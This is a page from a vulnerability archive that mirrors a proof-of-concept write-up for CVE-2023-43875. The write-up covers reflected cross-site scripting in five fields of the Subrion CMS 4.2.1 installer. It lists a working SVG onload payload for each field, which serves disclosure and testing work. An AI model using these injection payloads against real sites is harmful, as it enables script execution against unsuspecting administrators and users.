关联漏洞
标题:Subrion CMS 跨站脚本漏洞 (CVE-2023-43875)Description:Subrion CMS是Subrion团队的一套基于PHP的内容管理系统(CMS)。该系统可被集成到网站,并支持多种扩展插件等。 Subrion CMS v.4.2.1版本存在安全漏洞,该漏洞源于dbhost、dbname等多个参数存在跨站脚本(XSS)漏洞。
Description
Subrion CMS 4.2.1 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.
介绍
# Subrion CMS Reflected XSS v4.2.1
## Author: (Sergio)
**Description:** Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.
**Attack Vectors:** A vulnerability in the installation sanitation in the dbhost, dbname, dbuser, adminusername and adminemail allows JavaScript code to be injected.
---
### POC:
During the installation process we enter the XSS payload in any of the 5 fields and when we click on next, we will obtain the XSS pop-up
### XSS Payload:
```js
'"><svg/onload=alert('dbhost')>
```
### XSS Payload:
```js
'"><svg/onload=alert('dbname')>
```
### XSS Payload:
```js
'"><svg/onload=alert('dbuser')>
```
### XSS Payload:
```js
'"><svg/onload=alert('adminusername')>
```
### XSS Payload:
```js
'"><svg/onload=alert('adminemail')>
```

In the following image you can see the embedded code that executes the payload in the instalaltion process.





</br>
### Additional Information:
[http://www.cmsmadesimple.org/](https://subrion.org/)
https://owasp.org/Top10/es/A03_2021-Injection/
文件快照
[4.0K] /data/pocs/c70c66b32bd64eddb3b5e4e20a8c1706d084fddf
└── [2.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →